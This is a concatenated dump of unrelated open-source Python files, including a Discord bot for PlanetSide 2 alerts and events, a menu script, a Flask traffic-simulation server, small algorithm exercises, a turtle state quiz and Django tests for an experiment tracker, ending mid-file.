import NotFound\n\nlogging.getLogger('discord.http').setLevel(logging.INFO)\nlog = logging.getLogger('discord')\n\ndescription = \"A multipurpose bot made by ElReyZero\"\nintents = discord.Intents.default()\nintents.message_content = True\nbot = commands.Bot(command_prefix='$',\n description=description, intents=intents)\n\nasync def get_admins() -> list:\n \"\"\"Simple function that retrieves the admin User objects from the discord api.\n\n Returns:\n List: List with the admin user objects\n \"\"\"\n return [await bot.fetch_user(admin) for admin in cfg.admin_ids]\n\ndef setup_log():\n console_handler, file_handler, formatter = define_log()\n # Redirect stdout and stderr to log:\n sys.stdout = StreamToLogger(log, logging.INFO)\n sys.stderr = StreamToLogger(log, logging.ERROR)\n log.addHandler(file_handler)\n log.propagate = True\n discord.utils.setup_logging(handler=console_handler, formatter=formatter, level=logging.INFO)\n\n@bot.event\nasync def on_ready():\n \"\"\" Modified function that runs on the 'on_ready' event from the bot, it syncs the commands and starts the bot\n \"\"\"\n await bot.wait_until_ready()\n await bot.tree.sync()\n await bot.tree.sync(guild=discord.Object(id=cfg.MAIN_GUILD))\n await bot.change_presence(activity=discord.Game(name=\"with the API\"))\n cfg.bot_id = bot.user.id\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n if cfg.connections:\n update_genshin_chars.start()\n\n@bot.event\nasync def on_message(message):\n if message.content.startswith(\"https://twitter.com/\"):\n content = message.content.replace(\"https://twitter.com\", \"https://vxtwitter.com\")\n await message.delete()\n await message.channel.send(content)\n\n@bot.tree.error\nasync def on_app_command_error(interaction: discord.Interaction, error: Exception):\n \"\"\"Modified function that runs on the 'on_app_command_error' event, it handles errors from the bot.\n The default behaviour is to send a warning to the user that triggered the command and DM the main admin regarding the exception (if debug is set to True).\n \"\"\"\n # Depending on the type of exception, a different message will be sent\n traceback_message = format_exception(type(error), error, error.__traceback__)\n #exception_to_log(log, traceback_message)\n exception_to_log(log, error)\n try:\n original = error.original\n except AttributeError:\n original = error\n if type(original).__name__ == \"ConnectionError\":\n await interaction.response.send_message(f\"{interaction.user.mention} The PS2 API timed out, please try again!\")\n return\n elif type(original).__name__ == \"403 Forbidden\" or isinstance(original, discord.errors.Forbidden):\n await interaction.response.send_message(f\"{interaction.user.mention} Your DM's are disabled.\\nPlease enable 'Allow direct messages from server members' under the privacy tab of the server or 'Allow direct messages' on your privacy settings and try again.\")\n return\n try:\n await interaction.response.send_message((\"Uhhh something unexpected happened! Please try again or contact Rey if it keeps happening.\\nDetails: *{}*\").format(type(original).__name__))\n except discord.errors.InteractionResponded:\n pass\n # If the DEBUG variable is set, the bot will DM the main admin with the whole traceback. It's meant for debug purposes only\n if cfg.DEBUG:\n user = await bot.fetch_user(cfg.MAIN_ADMIN_ID)\n try:\n try:\n traceback_message = \"\".join(format_exception(\n type(error), error, error.__traceback__))\n await user.send(f\"Exception: {traceback_message}\")\n except TypeError:\n etype, value, tb = sys.exc_info()\n traceback_message = \"\".join(format_exception(etype, value, tb))\n await user.send(f\"Exception: {traceback_message}\")\n except discord.errors.HTTPException:\n etype, value, tb = sys.exc_info()\n traceback_message = \"\".join(format_exception(etype, value, tb))\n await user.send(f\"Exception: {traceback_message}\")\n raise error\n raise error\n except discord.errors.HTTPException:\n pass\n\n@commands.dm_only()\n@bot.command(aliases=[\"logs\", \"getLogs\"])\nasync def get_bot_logs(ctx: commands.Context):\n \"\"\"Command that returns the bot log file to the user that requested it.\n \"\"\"\n if ctx.author not in await get_admins():\n await ctx.send(\"You don't have permission to use this command!\")\n return\n try:\n await ctx.send(\"Here you go!\", file=discord.File(cfg.PROJECT_PATH+\"/logs/bot.log\"))\n except FileNotFoundError:\n await ctx.send(\"The log file doesn't exist!\")\n\n@bot.tree.command(name=\"alert_reminder\", description=\"Set up a reminder before an alert ends!\")\nasync def alert_reminder(interaction: discord.Interaction, continent: Literal[\"Indar\", \"Amerish\", \"Hossin\", \"Esamir\", \"Oshur\"], minutes: int = 5, server: Literal[\"Emerald\", \"Connery\", \"Cobalt\", \"Miller\", \"Soltech\", \"Jaeger\", \"Genudine\", \"Ceres\"] = \"Emerald\"):\n \"\"\"Command that sets up a reminder before an alert ends.\n \"\"\"\n # Check if the user had inputs for minutes, it also checks if it's valid\n minutes = 5 if minutes == None else minutes\n if minutes < 1:\n await interaction.response.send_message(f\"{interaction.user.mention} Please enter a valid number of minutes.\", ephemeral=True)\n return\n\n # Since the input has the continent and server names, they must be converted to their respective census id\n cont_id = continent_to_id(continent)\n server_id = name_to_server_ID(server, activeServer=False)\n req = requests.get(f\"https://api.ps2alerts.com/instances/active?world={server_id}&zone={cont_id}\")\n data = req.json()\n if len(data) > 0:\n data = data[0]\n # Formatting and replacing timezones\n startTime = data['timeStarted'][:-6]\n startTime = datetime.strptime(startTime, \"%Y-%m-%dT%H:%M:%S\")\n startTime = startTime.replace(tzinfo=timezone.utc).astimezone(tz=None)\n endTime = startTime + timedelta(minutes=90)\n\n if datetime.now() + timedelta(minutes=minutes) >= endTime.replace(tzinfo=None):\n await interaction.response.send_message(f\"There is less than {minutes} minutes in the alert, you cannot set a reminder for that!\")\n return\n\n # Setting up the alert reminder\n reminder = AlertReminder(continent, minutes, endTime, interaction.user)\n reminder.schedule_reminder(interaction)\n try:\n reminders = alert_reminder_dict[interaction.user.id]\n for reminder in reminders:\n if continent == reminder.continent:\n await interaction.response.send_message(f\"You've already set a reminder for {continent}\", ephemeral=True)\n return\n alert_reminder_dict[interaction.user.id].append(reminder)\n except KeyError:\n alert_reminder_dict[interaction.user.id] = list()\n alert_reminder_dict[interaction.user.id].append(reminder)\n await interaction.response.send_message(f\"{interaction.user.mention} You have successfully set a reminder for {continent}\\nThe alert will end \\nReminder set to {minutes} minutes before it ends\")\n else:\n await interaction.response.send_message(f\"{interaction.user.mention} There are no active alerts for {continent}\", ephemeral=True)\n\n@bot.tree.command(name=\"remove_alert_reminder\", description=\"Remove an alert reminder\")\nasync def remove_reminder(interaction: discord.Interaction, continent: Literal[\"Indar\", \"Amerish\", \"Hossin\", \"Esamir\", \"Oshur\"]):\n try:\n reminders = alert_reminder_dict[interaction.user.id]\n for reminder in reminders:\n if reminder.continent == continent:\n reminder.scheduler.cancel(reminder.event)\n reminders.remove(reminder)\n await interaction.response.send_message(f\"Your alert reminder for {continent} has been removed\", ephemeral=True)\n except KeyError:\n await interaction.response.send_message(f\"{interaction.user.mention} You do not have a reminder for {continent}\", ephemeral=True)\n\n@bot.tree.command(name=\"census_health\", description=\"Get the census API health check\")\nasync def census_health(interaction: discord.Interaction):\n try:\n embed = get_census_health()\n except JSONDecodeError:\n await interaction.response.send_message(\"Can't fetch data from Honu (It's most likely down). Please try again later.\")\n return\n refresh = Button(label=\"Refresh\", custom_id=\"refresh_health\",\n style=discord.ButtonStyle.blurple)\n\n async def refresh_callback(interaction: discord.Interaction):\n await interaction.response.defer()\n try:\n embed = get_census_health()\n await interaction.edit_original_response(embed=embed)\n except discord.errors.NotFound:\n pass\n except JSONDecodeError:\n await interaction.followup.send(\"Can't fetch data from Honu (It's most likely down). Please try again later.\")\n return\n refresh.callback = refresh_callback\n view = View(timeout=None)\n view.add_item(refresh)\n await interaction.response.send_message(embed=embed, view=view)\n\n\n@bot.tree.command(name=\"check_personal_reminders\", description=\"Check the alert reminders currently set (only for you)\")\nasync def check_personal_reminders(interaction: discord.Interaction):\n try:\n reminders = alert_reminder_dict[interaction.user.id]\n embed = discord.Embed(\n color=0xff0000, title=f\"Alert Reminders for {str(interaction.user)}\", description=\"Current alert reminders set\")\n for reminder in reminders:\n embed.add_field(name=reminder.continent,\n value=f\"{reminder.minutes} minutes before alert ends\", inline=True)\n await interaction.response.send_message(embed=embed, ephemeral=True)\n except KeyError:\n await interaction.response.send_message(f\"{interaction.user.mention} You do not have any alert reminders set\", ephemeral=True)\n\n@bot.tree.command(name=\"server_panel\", description=\"Check the active alerts and open continents on a server. Default: Emerald\")\nasync def check_server_panel(interaction: discord.Interaction, server: Literal[\"Emerald\", \"Connery\", \"Cobalt\", \"Miller\", \"Soltech\", \"Jaeger\", \"Genudine\", \"Ceres\"] = \"Emerald\"):\n try:\n embed = get_server_panel(server)\n if embed:\n refresh = Button(\n label=\"Refresh\", custom_id=\"refresh_alerts\", style=discord.ButtonStyle.blurple)\n\n async def refresh_callback(interaction):\n await interaction.response.defer()\n try:\n embed = get_server_panel(server)\n await interaction.edit_original_response(embed=embed)\n except discord.errors.NotFound:\n pass\n except JSONDecodeError:\n await interaction.followup.send(\"Can't fetch data from Honu (It's most likely down). Please try again later.\")\n return\n refresh.callback = refresh_callback\n view = View(timeout=None)\n view.add_item(refresh)\n await interaction.response.send_message(embed=embed, view=view)\n else:\n await interaction.response.send_message(f\"Can't fetch data from Honu or ps2alerts.com (It's most likely down). Please try again later.\")\n except JSONDecodeError:\n await interaction.followup.send(\"Can't fetch data from Honu (It's most likely down). Please try again later.\")\n return\n\n@bot.tree.command(name=\"send_timestamp\", description=\"Send a timestamp for an event given a time, date and event name\")\nasync def send_timestamp(interaction: discord.Interaction, event_name: str, date: str, time: str, timezone: Timezones):\n await interaction.response.defer()\n try:\n date = find_dates(date)\n for dates in date:\n date = dates\n break\n time = time.split(\":\")\n timestamp = date.replace(hour=int(time[0]), minute=int(time[1]))\n timezone_py = pytz_tz(get_IANA(timezone))\n timestamp = timezone_py.localize(timestamp).astimezone(None)\n embed = discord.Embed(\n color=0x171717, title=f\"{event_name}\", description=f\"{event_name} will happen at\")\n embed.add_field(\n name=\"Date\", value=f\"\", inline=True)\n embed.add_field(\n name=\"Relative\", value=f\"\", inline=True)\n get_timestamps_button = Button(\n label=\"Get Timestamps\", style=discord.ButtonStyle.blurple)\n ephemeral = False\n\n async def discord_time_format_callback(interaction: discord.Interaction):\n nonlocal ephemeral\n get_timestamps_button.disabled = True\n if ephemeral:\n await interaction.response.send_message(f\"Date: \\\\nRelative: \\\", ephemeral=True)\n else:\n await interaction.response.send_message(f\"Date: \\\\nRelative: \\\")\n ephemeral = True\n\n get_timestamps_button.callback = discord_time_format_callback\n view = View(timeout=None)\n view.add_item(get_timestamps_button)\n await interaction.followup.send(embed=embed, view=view)\n except AttributeError:\n await interaction.followup.send(f\"{interaction.user.mention} Invalid date format\", ephemeral=True)\n except (IndexError, ValueError):\n await interaction.followup.send(f\"{interaction.user.mention} Invalid time format, time must be in the format HH:MM (24h)\", ephemeral=True)\n\n@bot.tree.command(name=\"character\", description=\"Get the stats of a character\")\nasync def get_character_stats(interaction: discord.Interaction, character_name: str):\n await interaction.response.defer()\n embed = await get_PS2_character_embed(character_name)\n if embed:\n await interaction.followup.send(embed=embed)\n else:\n await interaction.followup.send(\"Character not found\")\n\n@bot.tree.command(name=\"crear_evento\", description=\"Crea un evento\")\nasync def create_event(interaction: discord.Interaction, zona_horaria: Timezones = \"EST\"):\n await interaction.response.send_modal(EventModal(zona_horaria))\n\n@bot.tree.command(name=\"agregar_jugador\", description=\"Agrega un jugador a un evento\")\nasync def add_player_to_event(interaction: discord.Interaction, id_evento:str, jugador: discord.Member):\n channel = interaction.channel\n try:\n if interaction.user.id != event_dict[id_evento].owner_id:\n await interaction.response.send_message(\"No puedes agregar jugadores ya que no eres dueño del evento\", ephemeral=True)\n return\n message = await channel.fetch_message(event_dict[id_evento].message_id)\n if jugador.mention in event_dict[id_evento].accepted:\n await interaction.response.send_message(f\"{jugador.mention} ya está en el evento\", ephemeral=True)\n return\n elif jugador.mention in event_dict[id_evento].reserves:\n event_dict[id_evento].reserves.remove(jugador.mention)\n\n if len(event_dict[id_evento].accepted) == event_dict[id_evento].player_count:\n event_dict[id_evento].reserves.append(jugador.mention)\n else:\n event_dict[id_evento].accepted.append(jugador.mention)\n evento = event_dict[id_evento]\n\n await message.edit(embed=event_embed(id_evento, evento.date, evento.time, evento.timezone, evento.activity, evento.description, evento.player_count, evento.accepted, evento.reserves))\n await interaction.response.send_message(f\"{jugador.mention} fue agregado al evento {id_evento}\", ephemeral=True)\n except KeyError:\n await interaction.response.send_message(f\"{interaction.user.mention} No se encontró el evento {id_evento}\", ephemeral=True)\n return\n except NotFound:\n await interaction.response.send_message(f\"{interaction.user.mention} Solo puedes agregar jugadores en el canal donde se creó el evento\", ephemeral=True)\n return\n\n@bot.tree.command(name=\"remover_jugador\", description=\"Remueve un jugador de un evento\")\nasync def remove_player_from_event(interaction: discord.Interaction, id_evento:str, jugador: discord.Member):\n channel = interaction.channel\n try:\n if interaction.user.id != event_dict[id_evento].owner_id:\n await interaction.response.send_message(\"No puedes remover jugadores ya que no eres dueño del evento\", ephemeral=True)\n return\n message = await channel.fetch_message(event_dict[id_evento].message_id)\n if jugador.mention in event_dict[id_evento].accepted:\n event_dict[id_evento].accepted.remove(jugador.mention)\n elif jugador.mention in event_dict[id_evento].reserves:\n event_dict[id_evento].reserves.remove(jugador.mention)\n else:\n await interaction.response.send_message(f\"{jugador.mention} no está en el evento\", ephemeral=True)\n return\n\n evento = event_dict[id_evento]\n\n await message.edit(embed=event_embed(id_evento, evento.date, evento.time, evento.timezone, evento.activity, evento.description, evento.player_count, evento.accepted, evento.reserves))\n await interaction.response.send_message(f\"{jugador.mention} fue removido del evento {id_evento}\", ephemeral=True)\n except KeyError:\n await interaction.response.send_message(f\"{interaction.user.mention} No se encontró el evento {id_evento}\", ephemeral=True)\n return\n except NotFound:\n await interaction.response.send_message(f\"{interaction.user.mention} Solo puedes remover jugadores en el canal donde se creó el evento\", ephemeral=True)\n return\n\nif __name__ == \"__main__\":\n # Defining the logger\n console_handler = setup_log()\n # Setting up the config\n cfg.get_config()\n cfg.connections = set_connections()\n if cfg.connections:\n main_exit_handler(cfg.connections)\n cfg.connections.connect(\"genshin\")\n\n # Group commands\n bot.tree.add_command(GenshinDB(), guild=discord.Object(id=cfg.MAIN_GUILD))\n bot.run(cfg.DISCORD_TOKEN, log_handler=console_handler)","repo_name":"ElReyZero/ReyBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":19778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16995985577","text":"# menuy.py - function style menu\n# Imports typically listed at top\n# each import enables us to use logic that has been abstracted to other files and folders\nimport matrix, swap, mathy, tree, advy, carlist\n\n##\n# Menu banner\nborder = \"=\" * 25\nbanner = f\"\\n{border}\\nPlease Select An Option\\n{border}\"\n# Main list of [Prompts, Actions]\n# Two styles are supported to execute abstracted logic\n# 1. \"filename.py\" will be run by exec(open(\"filename.py\").read())\n# 2. file.function references will be executed as file.function()\nmain_menu = [\n [\"Matrix\", matrix.driver],\n [\"Swap\", swap.driver],\n [\"Tree\", tree.driver],\n [\"Car List\", carlist.driver],\n]\n\n# Submenu list of [Prompt, Action]\n# Works similarly to main_menu\nsub_menu = [\n [\"Factors\", mathy.factors],\n [\"GCD\", mathy.gcd],\n [\"LCM\", mathy.lcm],\n [\"Primes\", mathy.primes],\n]\n\nquiz_sub_menu = [\n [\"At the Beach?\", advy.beach],\n [\"On top of the Mountains?\", advy.mountain],\n [\"Navigating a lake?\", advy.lake]\n]\n\n\ndef menu(banner, options):\n # header for menu\n print(banner)\n # build a dictionary from options\n prompts = {0: [\"Exit\", None]}\n for op in options:\n index = len(prompts)\n prompts[index] = op\n\n # print menu or dictionary\n for key, value in prompts.items():\n print(key, '->', value[0])\n\n # get user choice\n choice = input(\"Type your choice> \")\n\n # validate choice and run\n # execute selection\n # convert to number\n try:\n choice = int(choice)\n if choice == 0:\n # stop\n return\n print(choice)\n try:\n # try as function\n action = prompts.get(choice)[1]\n action()\n except TypeError:\n try: # try as playground style\n exec(open(action).read())\n except FileNotFoundError:\n print(f\"File not found!: {action}\")\n # end function try\n # end prompts try\n except ValueError:\n # not a number error\n print(f\"Not a number: {choice}\")\n except UnboundLocalError:\n # traps all other errors\n print(f\"Invalid choice: {choice}\")\n except TypeError:\n print(f\"Not callable {action}\")\n # end validation try\n\n menu(banner, options) # recursion, start menu over again\n\n\n# def submenu\n# using sub menu list above:\n# sub_menu works similarly to menu()\ndef submenu():\n title = \"Function Submenu\" + banner\n menu(title, sub_menu)\n\n\n# def quiz submenu\n# using sub menu list above:\n# sub_menu works similarly to menu()\ndef quiz_submenu():\n title = \"Function Submenu\" + banner\n menu(title, quiz_sub_menu)\n\n\ndef driver():\n title = \"Function Menu\" + banner\n menu_list = main_menu.copy()\n menu_list.append([\"Math\", submenu])\n menu_list.append([\"quiz\", quiz_submenu])\n menu(title, menu_list)\n\nif __name__ == \"__main__\":\n driver()\n","repo_name":"nighthawkcoders/nighthawk_csp","sub_path":"hacks/menuy.py","file_name":"menuy.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"74825181207","text":"from flask import Flask, request, jsonify\nfrom agent import *\nfrom model import RandomModel\n\n# Size of the board:\nnumber_agents = 1\nrandomModel = None\ncurrentStep = 0\n\napp = Flask(\"Traffic example\")\n\n# @app.route('/', methods=['POST', 'GET'])\n\n@app.route('/init', methods=['POST', 'GET'])\ndef initModel():\n global currentStep, randomModel, number_agents\n\n if request.method == 'POST':\n number_agents = int(request.form.get('NAgents'))\n currentStep = 0\n\n print(request.form)\n print(number_agents)\n randomModel = RandomModel(number_agents)\n\n return jsonify({\"message\":\"Parameters recieved, model initiated.\"})\n\n@app.route('/getAgents', methods=['GET'])\ndef getAgents():\n global randomModel\n\n if request.method == 'GET':\n # agentPositions = [{\"id\": str(a.unique_id), \"x\": x, \"y\": 0.08, \"z\":z} for (a, x, z) in randomModel.grid.coord_iter() if isinstance(a, Car)]\n\n agentPositions = []\n\n for (a, x, z) in randomModel.grid.coord_iter():\n for agent in a:\n if isinstance(agent, Car):\n agentPositions.append({\"id\": str(agent.unique_id), \"x\": x, \"y\": 0.08, \"z\":z})\n\n\n\n return jsonify({'positions':agentPositions})\n\n\n@app.route('/update', methods=['GET'])\ndef updateModel():\n global currentStep, randomModel\n if request.method == 'GET':\n randomModel.step()\n currentStep += 1\n return jsonify({'message':f'Model updated to step {currentStep}.', 'currentStep':currentStep})\n\nif __name__=='__main__':\n app.run(host=\"localhost\", port=8585, debug=True)","repo_name":"IvanDLar/TC2008BSisuben","sub_path":"ReactiveAgents/trafficBase/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"363930775","text":"#4.5 Validate BST\r\n\"\"\"\r\nImplement a function to check if a binary tree is a binary search tree.\r\n\"\"\"\r\nfrom math import inf\r\n\r\ndef validateBST(root):\r\n stack = []\r\n lastVal = -inf\r\n\r\n while True:\r\n if root is not None:\r\n stack.append(root)\r\n root = root.left\r\n else:\r\n if stack != []:\r\n root = stack.pop()\r\n if lastVal > root.val: return False\r\n lastVal = root.val\r\n root = root.right\r\n else:\r\n break\r\n \r\n return True\r\n","repo_name":"victorplusc/Algorithms","sub_path":"Cracking the Coding Interview/4.5 Validate BST.py","file_name":"4.5 Validate BST.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"28636548921","text":"\"\"\"\nGiven two strings s1 and s2, write a function to return true if s2 contains the permutation of s1. \nIn other words, one of the first string's permutations is the substring of the second string.\n\nExample 1:\nInput: s1 = \"ab\" s2 = \"eidbaooo\"\nOutput: True\nExplanation: s2 contains one permutation of s1 (\"ba\").\n\nExample 2:\nInput:s1= \"ab\" s2 = \"eidboaoo\"\nOutput: False\n\nNote:\n The input strings only contain lower case letters.\n The length of both given strings is in range [1, 10,000].\n\"\"\"\n\n#Use hash it's very efficient\n\nclass Solution:\n def checkInclusion(self, s1: str, s2: str) -> bool:\n hashp = sum(hash(ch) for ch in s1)\n hashi = sum(hash(ch) for ch in s2[:len(s1)-1])\n for (ch_out, ch_in) in zip([\"\"] + list(s2), s2[len(s1)-1:]):\n hashi += hash(ch_in) - hash(ch_out)\n if hashi == hashp:\n return True\n \n return False\n \n","repo_name":"raniyer/Learning-competitive-coding","sub_path":"Permutation_in_String.py","file_name":"Permutation_in_String.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70039419287","text":"# 피보나치 수열\n\n# 앞의 두 개�� 숫자를 더해서 뒤의 숫자를 만드는 개념이다.\n\ntable = {0:0, 1:1}\n\ndef fib(n):\n if n not in table:\n value = fib(n-1) + fib(n-2)\n table[n] = value\n return table[n]\n\n# 예시\nprint(fib(100))\n","repo_name":"LeeEunHak/Python_Study","sub_path":"CHAPTER07_자료구조/fib.py","file_name":"fib.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7400298361","text":"import pandas\r\nimport turtle\r\n\r\nscreen = turtle.Screen()\r\nscreen.title(\"US State Quiz\")\r\nscreen.setup(width=700, height=500)\r\nimage = \"blank_states_img.gif\"\r\nscreen.addshape(image)\r\nturtle.shape(image)\r\n\r\nwriter = turtle.Turtle()\r\nwriter.ht()\r\nwriter.penup()\r\n\r\ndata = pandas.read_csv(\"50_states.csv\")\r\nall_states = data.state.to_list()\r\nguessed_states = []\r\n\r\nwhile len(guessed_states) < 50:\r\n answer = screen.textinput(f\"{len(guessed_states)}/50 Correct\", \"Name of a State: \").title()\r\n \r\n state = data[data['state'] == answer]\r\n if not state.empty:\r\n writer.goto(int(state.x), int(state.y))\r\n writer.write(answer)\r\n guessed_states.append(answer)\r\n if answer == 'Exit':\r\n missing_states = [state for state in all_states if state not in guessed_states]\r\n # for state in all_states:\r\n # if state not in guessed_states:\r\n # missing_states.append(state)\r\n df = pandas.DataFrame(missing_states)\r\n df.to_csv(\"missing_states.csv\")\r\n break\r\n \r\n","repo_name":"Ghosdak/USStateQuiz","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26889714029","text":"#!/usr/bin/env python\n\nwith open('data/primes.txt') as f:\n PRIME_FACTORS = []\n for num in f:\n if int(num) <= 1000:\n PRIME_FACTORS.append(int(num))\n else:\n break\n\n\ndef find_change(target=11):\n\n while True:\n number_ways = [1] + [0] * target\n for prime in PRIME_FACTORS:\n for n in range(prime, target + 1):\n number_ways[n] += number_ways[n - prime]\n if number_ways[target] > 5000:\n return target\n target += 1\n\n\ndef main():\n first5000 = find_change()\n print(first5000)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"chadheyne/project-euler","sub_path":"problem077.py","file_name":"problem077.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36168955108","text":"\"\"\"\nThis file demonstrates writing tests using the unittest module. These will pass\nwhen you run \"manage.py test\".\n\nReplace this with more appropriate tests for your application.\n\"\"\"\nfrom django.test import TestCase, Client\nimport json, time, sys, datetime\nimport os\nos.environ['DISPLAY'] = ':0'\n\nfrom tracker import models\nfrom tracker import tasktrack\nfrom tracker import views\n# import psutil\n\nfrom riglib.experiment import LogExperiment\n\n\nclass TestDataFile(TestCase):\n def setUp(self):\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n subj = models.Subject.objects.get(name=\"test_subject\")\n\n task = models.Task(name=\"test_task\")\n task.save()\n task = models.Task.objects.get(name=\"test_task\")\n\n te = models.TaskEntry(subject_id=subj.id, task_id=task.id)\n te.save()\n\n system = models.System(name=\"test_system\", path=\"\", archive=\"\")\n system.save()\n\n def test_file_linking(self):\n te = models.TaskEntry.objects.all()[0]\n system = models.System.objects.get(name=\"test_system\")\n data_file = models.DataFile(path=\"dummy_file_path\", system_id=system.id, entry_id=te.id)\n data_file.save()\n\n data_file = models.DataFile.objects.get(path=\"dummy_file_path\")\n\n self.assertTrue(data_file.entry_id == te.id)\n self.assertTrue(data_file.system_id == system.id)\n\n #def test_data_file_linking_through_post(self):\n # c = Client()\n # post_data = {'file_path':\"dummy_file_path\", 'data_system_id':1}\n # te = models.TaskEntry.objects.all()[0]\n # c.post(\"/exp_log/link_data_files/%d/submit\" % te.id, post_data)\n\n # data_file = models.DataFile.objects.get(path=\"dummy_file_path\")\n # self.assertEqual(data_file.entry_id, te.id)\n\n\nclass TestModels(TestCase):\n def test_add_new_task_to_table(self):\n c = Client()\n\n post_data = {\"name\": \"test_add_new_task_to_table\",\n \"import_path\": \"riglib.experiment.LogExperiment\"}\n resp = c.post(\"/setup/add/new_task\", post_data)\n\n task = models.Task.objects.get(name=\"test_add_new_task_to_table\")\n task_cls = task.get()\n self.assertEqual(task_cls, LogExperiment)\n\n def test_add_new_feature_to_table(self):\n c = Client()\n post_data = {\"name\": \"saveHDF\",\n \"import_path\": \"features.hdf_features.SaveHDF\"}\n resp = c.post(\"/setup/add/new_feature\", post_data)\n\n feat = models.Feature.objects.get(name=\"saveHDF\")\n feat_cls = feat.get()\n from features.hdf_features import SaveHDF\n self.assertEqual(feat_cls, SaveHDF)\n\n feat.delete()\n self.assertEqual(len(models.Feature.objects.all()), 0)\n\n def test_add_new_subject_from_POST(self):\n test_name = \"test_subject_post\"\n c = Client()\n post_data = {\"subject_name\": test_name}\n\n resp = c.post(\"/setup/add/new_subject\", post_data)\n\n subj = models.Subject.objects.get(name=test_name)\n self.assertEqual(subj.name, test_name)\n\n def test_add_built_in_feature_from_POST(self):\n c = Client()\n self.assertEqual(len(models.Feature.objects.all()), 0)\n\n post_data = {\"saveHDF\": 1}\n resp = c.post(\"/setup/add/enable_features\", post_data)\n\n from features.hdf_features import SaveHDF\n feat = models.Feature.objects.get(name=\"saveHDF\")\n self.assertEqual(feat.get(), SaveHDF)\n\n feat.delete()\n self.assertEqual(len(models.Feature.objects.all()), 0)\n\n def test_add_new_task_no_features(self):\n task = models.Task(name=\"test_task\", import_path=\"riglib.experiment.LogExperiment\")\n task.save()\n task = models.Task.objects.get(name=\"test_task\")\n\n task_cls = task.get()\n from riglib.experiment import LogExperiment\n self.assertEqual(task_cls, LogExperiment)\n\n def test_create_task_entry(self):\n \"\"\"\n \"\"\"\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n subj = models.Subject.objects.get(name=\"test_subject\")\n\n task = models.Task(name=\"test_task\")\n task.save()\n task = models.Task.objects.get(name=\"test_task\")\n\n te = models.TaskEntry(subject_id=subj.id, task_id=task.id)\n te.save()\n\n def test_task_entry_collections(self):\n # setup\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n subj = models.Subject.objects.get(name=\"test_subject\")\n\n task = models.Task(name=\"test_task\")\n task.save()\n task = models.Task.objects.get(name=\"test_task\")\n\n te1 = models.TaskEntry(subject_id=subj.id, task_id=task.id)\n te1.save()\n\n te2 = models.TaskEntry(subject_id=subj.id, task_id=task.id)\n te2.save()\n\n col = models.TaskEntryCollection(name=\"new_col\")\n col.save()\n col.add_entry(te1)\n\n self.assertEqual(len(col.entries.all()), 1)\n\n # adding the same entry twice shouldn't do anything\n col.add_entry(te1)\n self.assertEqual(len(col.entries.all()), 1)\n\n # adding a second entry should increase the length of the list\n col.add_entry(te2)\n self.assertEqual(len(col.entries.all()), 2)\n\n # remove_entry should cause a change in the list\n col.remove_entry(te1)\n self.assertEqual(len(col.entries.all()), 1)\n self.assertEqual(col.entries.all()[0].id, te2.id)\n\n\nclass TestExpLog(TestCase):\n def test_list_exp_history(self):\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n subj = models.Subject.objects.get(name=\"test_subject\")\n\n task = models.Task(name=\"test_task\")\n task.save()\n task = models.Task.objects.get(name=\"test_task\")\n\n list_data0 = views._list_exp_history()\n self.assertEqual(len(list_data0['entries']), 0)\n self.assertEqual(len(list_data0['subjects']), 1)\n self.assertEqual(len(list_data0['tasks']), 1)\n self.assertEqual(len(list_data0['features']), 0)\n self.assertEqual(len(list_data0['generators']), 0)\n\n te1 = models.TaskEntry(subject_id=subj.id, task_id=task.id, date=datetime.datetime.now())\n te1.save()\n\n list_data1 = views._list_exp_history()\n self.assertEqual(len(list_data1['entries']), 1)\n self.assertEqual(len(list_data1['subjects']), 1)\n self.assertEqual(len(list_data1['tasks']), 1)\n self.assertEqual(len(list_data1['features']), 0)\n self.assertEqual(len(list_data1['generators']), 0)\n\n\n for k in range(300):\n te2_date = datetime.datetime.now() - datetime.timedelta(days=k)\n te2 = models.TaskEntry(subject_id=subj.id, task_id=task.id, date=te2_date)\n te2.save()\n\n # all entries returned if no args\n list_data2 = views._list_exp_history()\n self.assertEqual(len(list_data2['entries']), 301)\n\n # 'listall' should return all entries\n list_data3 = views._list_exp_history(max_entries=100)\n self.assertEqual(len(list_data3['entries']), 100)\n\nclass TestGenerators(TestCase):\n def test_generator_retreival(self):\n task = models.Task(name=\"test_task1\", import_path=\"riglib.experiment.mocks.MockSequenceWithGenerators\")\n task.save()\n\n models.Generator.populate()\n self.assertEqual(len(models.Generator.objects.all()), 2)\n\n\nclass TestVisualFeedbackTask(TestCase):\n def test_start_experiment_python(self):\n import json\n from built_in_tasks.passivetasks import TargetCaptureVFB2DWindow\n from riglib import experiment\n from features import Autostart\n from tracker import json_param\n\n try:\n import pygame\n except ImportError:\n print(\"Skipping test due to pygame missing\")\n return\n\n # Create all the needed database entries\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n\n task = models.Task(name=\"test_vfb\", import_path=\"built_in_tasks.passivetasks.TargetCaptureVFB2DWindow\")\n task.save()\n\n models.Generator.populate()\n gen = models.Generator.objects.get(name='centerout_2D_discrete')\n\n seq_params = dict(nblocks=1, ntargets=1)\n seq_rec = 